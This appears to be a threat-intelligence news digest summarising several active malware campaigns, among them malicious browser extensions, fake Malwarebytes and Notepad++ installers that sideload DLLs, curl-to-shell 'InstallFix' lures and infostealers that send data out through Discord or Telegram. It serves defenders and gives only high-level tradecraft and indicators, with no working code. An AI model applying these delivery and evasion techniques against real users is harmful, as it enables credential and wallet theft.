Social-Engineering Malware Campaigns Targeting End Users via Browser Stores and Fake Installers
Multiple active social-engineering-driven malware operations are targeting end users through trusted distribution channels. One campaign, dubbed GhostPoster, distributed 17 malicious browser extensions across Chrome, Firefox, and Edge with 840,000+ installs, using legitimate-sounding names (e.g., “Google Translate in Right Click,” “Youtube Download,” “Ads Block Ultimate”) and evading store reviews for years. The extensions used steganography to hide code in PNGs, then extracted payloads to contact attacker infrastructure, enabling credential/data theft, tracking, affiliate-link hijacking, script injection, and HTTP header manipulation to weaken protections.
Separately, threat actors are impersonating Malwarebytes via trojanized ZIP “installers” (e.g., malwarebytes-windows-github-io-X.X.X.zip) and using DLL sideloading—pairing a legitimate EXE with a malicious CoreMessaging.dll—to execute infostealers; reporting highlighted a campaign fingerprint via behash 4acaac53c8340a8c236c91e68244e6cb and distinctive DLL strings used for infrastructure mapping. A different operation identified by CloudSEK involves “RedLineCyber” masquerading as an affiliate of “RedLine Solutions” to build credibility inside private Discord communities and deliver a Python-based clipboard hijacker (often Pro.exe / peeek.exe) aimed at cryptocurrency wallet theft, relying on long-term grooming of high-value targets rather than broad phishing.
Related Entities
Threat Actors
Affected Products
Sources
Related Stories
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
1 months ago
Social-engineering malware delivery via trusted installation and download paths
Security researchers reported two active/feasible malware-delivery patterns that abuse user trust in “normal” software acquisition flows rather than exploiting a specific browser or OS vulnerability. LayerX demonstrated a proof-of-concept Chrome add-on (*Totally Innocent Extension*) that can **silently modify executables as they are downloaded**—including from legitimate vendor sites—by appending attacker-controlled code without breaking the original application or requiring additional extension permissions, enabling follow-on outcomes such as persistence, lateral movement, and data theft. The researchers said the technique highlights gaps in browser extension security controls; Google and Mozilla did not acknowledge it as a product issue, with Google indicating social-engineering-driven intrusions fall outside its browser threat model. Separately, Push Security documented **InstallFix**, a new variant of the ClickFix social-engineering technique, where attackers clone installation pages for popular CLI tools and replace the install steps with malicious “copy/paste” commands (e.g., `curl`-to-shell patterns) that fetch payloads from attacker infrastructure. A noted example used a cloned *Claude Code* (Anthropic) CLI install page that preserved legitimate branding and redirected most links back to the real site, while only the macOS/Windows install instructions delivered malware; the pages were promoted via **Google Ads malvertising** for searches like “Claude Code install,” increasing the likelihood of developer and non-developer victims executing the malicious commands.
1 weeks ago
Credential-Theft Malware Campaigns Targeting Windows via Social Engineering and Trusted Services
Multiple reports describe **active malware campaigns targeting Windows users** with a focus on **credential, session, and wallet theft** delivered through social engineering and abuse of legitimate services. **CharlieKirk Grabber**, a Python infostealer packaged with *PyInstaller*, is distributed via phishing, cracked software, cheats, and social-media lures; it kills browser processes (via `TASKKILL`) to access credential stores, collects passwords/cookies/autofill/Wi‑Fi data, zips the loot, uploads it to *GoFile*, and relays the download link to operators via **Discord webhooks** or **Telegram bots**. Separately, attackers are buying **Facebook ads** impersonating Microsoft to drive victims to cloned Windows 11 download pages on lookalike domains (e.g., `ms-25h2-update[.]pro`), delivering a malicious installer that steals saved passwords, browser sessions, and **cryptocurrency wallet** data; the campaign uses **geofencing/sandbox evasion** to show benign content to data-center IPs while serving malware to likely end users. Other contemporaneous activity highlights broader Windows-targeted intrusion tradecraft and adjacent threats. FortiGuard Labs reported **Winos 4.0 (ValleyRat)** phishing campaigns in Taiwan using tax and e-invoice lures, with delivery chains including malicious **LNK** downloaders, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud hosting. In LATAM, a fake bank-receipt lure delivers **XWorm v5.6** via a `.pdf.js` double-extension WSH dropper that uses junk-padding and Unicode obfuscation, then reconstructs and runs PowerShell (spawned via WMI) and abuses trusted hosting (e.g., Cloudinary) for later stages—enabling credential theft and potential ransomware follow-on. Additional reporting covered a USB-propagating **Monero cryptomining** operation capable of crossing air-gapped environments, a new Linux **SysUpdate** variant with encrypted C2 traffic (and a Unicorn Engine-based decryption approach developed during DFIR), and the **Foxveil** loader abusing **Cloudflare Pages, Netlify, and Discord** to stage shellcode and persist via services or *SysWOW64* masquerading—these are separate threats but reinforce the trend of attackers blending into trusted infrastructure and common user workflows.
3 weeks ago